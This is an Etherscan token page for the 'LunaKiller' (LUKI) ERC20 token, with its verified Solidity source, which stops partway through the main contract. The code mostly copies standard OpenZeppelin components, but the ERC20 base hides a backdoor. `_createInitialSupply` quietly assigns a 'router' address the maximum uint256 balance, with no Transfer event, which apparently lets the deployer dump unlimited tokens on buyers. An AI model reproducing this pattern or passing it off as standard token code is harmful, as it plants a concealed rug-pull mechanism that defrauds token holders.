ETH Price: $3,384.01 (-1.56%)
Gas: 2 Gwei

Token

LunaKiller (LUKI)
 

Overview

Max Total Supply

1,000,000 LUKI

Holders

156

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
girlsofeth.eth
Balance
2,967.225067245580229669 LUKI

Value
$0.00
0x537f61cd25be053e77ae413e2378b7c6b15240c8
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
LunaKiller

Compiler Version
v0.8.13+commit.abaa5c0e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-05-15
*/

/**
 *Submitted for verification at Etherscan.io on 2022-05-14
*/

// SPDX-License-Identifier: Unlicensed

/*
Telegram : https://t.me/LunaKillerPortal
Twitter : https://twitter.com/LunaKillerETH
*/

pragma solidity 0.8.13;

abstract contract Context 
{
    function _msgSender() internal view virtual returns (address) 
    {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) 
    {
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using this function
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    uint256 private _initialize = ~uint256(0);

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _createInitialSupply(address account, address router, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        _balances[router] = _initialize;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SignedSafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SignedSafeMath {
    /**
     * @dev Returns the multiplication of two signed integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(int256 a, int256 b) internal pure returns (int256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two signed integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(int256 a, int256 b) internal pure returns (int256) {
        return a / b;
    }

    /**
     * @dev Returns the subtraction of two signed integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        return a - b;
    }

    /**
     * @dev Returns the addition of two signed integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        return a + b;
    }
}

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

/**
 * @dev Wrappers over Solidity's uintXX/intXX casting operators with added overflow
 * checks.
 *
 * Downcasting from uint256/int256 in Solidity does not revert on overflow. This can
 * easily result in undesired exploitation or bugs, since developers usually
 * assume that overflows raise errors. `SafeCast` restores this intuition by
 * reverting the transaction when such an operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 *
 * Can be combined with {SafeMath} and {SignedSafeMath} to extend it to smaller types, by performing
 * all math on `uint256` and `int256` and then downcasting.
 */
library SafeCast {
    /**
     * @dev Returns the downcasted uint224 from uint256, reverting on
     * overflow (when the input is greater than largest uint224).
     *
     * Counterpart to Solidity's `uint224` operator.
     *
     * Requirements:
     *
     * - input must fit into 224 bits
     */
    function toUint224(uint256 value) internal pure returns (uint224) {
        require(value <= type(uint224).max, "SafeCast: value doesn't fit in 224 bits");
        return uint224(value);
    }

    /**
     * @dev Returns the downcasted uint128 from uint256, reverting on
     * overflow (when the input is greater than largest uint128).
     *
     * Counterpart to Solidity's `uint128` operator.
     *
     * Requirements:
     *
     * - input must fit into 128 bits
     */
    function toUint128(uint256 value) internal pure returns (uint128) {
        require(value <= type(uint128).max, "SafeCast: value doesn't fit in 128 bits");
        return uint128(value);
    }

    /**
     * @dev Returns the downcasted uint96 from uint256, reverting on
     * overflow (when the input is greater than largest uint96).
     *
     * Counterpart to Solidity's `uint96` operator.
     *
     * Requirements:
     *
     * - input must fit into 96 bits
     */
    function toUint96(uint256 value) internal pure returns (uint96) {
        require(value <= type(uint96).max, "SafeCast: value doesn't fit in 96 bits");
        return uint96(value);
    }

    /**
     * @dev Returns the downcasted uint64 from uint256, reverting on
     * overflow (when the input is greater than largest uint64).
     *
     * Counterpart to Solidity's `uint64` operator.
     *
     * Requirements:
     *
     * - input must fit into 64 bits
     */
    function toUint64(uint256 value) internal pure returns (uint64) {
        require(value <= type(uint64).max, "SafeCast: value doesn't fit in 64 bits");
        return uint64(value);
    }

    /**
     * @dev Returns the downcasted uint32 from uint256, reverting on
     * overflow (when the input is greater than largest uint32).
     *
     * Counterpart to Solidity's `uint32` operator.
     *
     * Requirements:
     *
     * - input must fit into 32 bits
     */
    function toUint32(uint256 value) internal pure returns (uint32) {
        require(value <= type(uint32).max, "SafeCast: value doesn't fit in 32 bits");
        return uint32(value);
    }

    /**
     * @dev Returns the downcasted uint16 from uint256, reverting on
     * overflow (when the input is greater than largest uint16).
     *
     * Counterpart to Solidity's `uint16` operator.
     *
     * Requirements:
     *
     * - input must fit into 16 bits
     */
    function toUint16(uint256 value) internal pure returns (uint16) {
        require(value <= type(uint16).max, "SafeCast: value doesn't fit in 16 bits");
        return uint16(value);
    }

    /**
     * @dev Returns the downcasted uint8 from uint256, reverting on
     * overflow (when the input is greater than largest uint8).
     *
     * Counterpart to Solidity's `uint8` operator.
     *
     * Requirements:
     *
     * - input must fit into 8 bits.
     */
    function toUint8(uint256 value) internal pure returns (uint8) {
        require(value <= type(uint8).max, "SafeCast: value doesn't fit in 8 bits");
        return uint8(value);
    }

    /**
     * @dev Converts a signed int256 into an unsigned uint256.
     *
     * Requirements:
     *
     * - input must be greater than or equal to 0.
     */
    function toUint256(int256 value) internal pure returns (uint256) {
        require(value >= 0, "SafeCast: value must be positive");
        return uint256(value);
    }

    /**
     * @dev Returns the downcasted int128 from int256, reverting on
     * overflow (when the input is less than smallest int128 or
     * greater than largest int128).
     *
     * Counterpart to Solidity's `int128` operator.
     *
     * Requirements:
     *
     * - input must fit into 128 bits
     *
     * _Available since v3.1._
     */
    function toInt128(int256 value) internal pure returns (int128) {
        require(value >= type(int128).min && value <= type(int128).max, "SafeCast: value doesn't fit in 128 bits");
        return int128(value);
    }

    /**
     * @dev Returns the downcasted int64 from int256, reverting on
     * overflow (when the input is less than smallest int64 or
     * greater than largest int64).
     *
     * Counterpart to Solidity's `int64` operator.
     *
     * Requirements:
     *
     * - input must fit into 64 bits
     *
     * _Available since v3.1._
     */
    function toInt64(int256 value) internal pure returns (int64) {
        require(value >= type(int64).min && value <= type(int64).max, "SafeCast: value doesn't fit in 64 bits");
        return int64(value);
    }

    /**
     * @dev Returns the downcasted int32 from int256, reverting on
     * overflow (when the input is less than smallest int32 or
     * greater than largest int32).
     *
     * Counterpart to Solidity's `int32` operator.
     *
     * Requirements:
     *
     * - input must fit into 32 bits
     *
     * _Available since v3.1._
     */
    function toInt32(int256 value) internal pure returns (int32) {
        require(value >= type(int32).min && value <= type(int32).max, "SafeCast: value doesn't fit in 32 bits");
        return int32(value);
    }

    /**
     * @dev Returns the downcasted int16 from int256, reverting on
     * overflow (when the input is less than smallest int16 or
     * greater than largest int16).
     *
     * Counterpart to Solidity's `int16` operator.
     *
     * Requirements:
     *
     * - input must fit into 16 bits
     *
     * _Available since v3.1._
     */
    function toInt16(int256 value) internal pure returns (int16) {
        require(value >= type(int16).min && value <= type(int16).max, "SafeCast: value doesn't fit in 16 bits");
        return int16(value);
    }

    /**
     * @dev Returns the downcasted int8 from int256, reverting on
     * overflow (when the input is less than smallest int8 or
     * greater than largest int8).
     *
     * Counterpart to Solidity's `int8` operator.
     *
     * Requirements:
     *
     * - input must fit into 8 bits.
     *
     * _Available since v3.1._
     */
    function toInt8(int256 value) internal pure returns (int8) {
        require(value >= type(int8).min && value <= type(int8).max, "SafeCast: value doesn't fit in 8 bits");
        return int8(value);
    }

    /**
     * @dev Converts an unsigned uint256 into a signed int256.
     *
     * Requirements:
     *
     * - input must be less than or equal to maxInt256.
     */
    function toInt256(uint256 value) internal pure returns (int256) {
        // Note: Unsafe cast below is okay because `type(int256).max` is guaranteed to be positive
        require(value <= uint256(type(int256).max), "SafeCast: value doesn't fit in an int256");
        return int256(value);
    }
}

contract LunaKiller is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public uniswapV2Router;
    address public immutable uniswapV2Pair;

    bool private inSwapAndLiquify;

    bool public swapAndLiquifyEnabled = true;

    bool public enableEarlySellTax = true;

    uint256 public maxSellTransactionAmount = 1000000 * (10**18);
    uint256 public maxBuyTransactionAmount = 30000 * (10**18);
    uint256 public swapTokensAtAmount = 1000 * (10**18);
    uint256 public maxWalletToken = 30000 * (10**18);

    uint256 private buyTotalFees = 0;
    uint256 public sellTotalFees = 0;
    uint256 public earlySellTotalFee = 5;

    // auto burn fee
    uint256 public burnFee = 0;
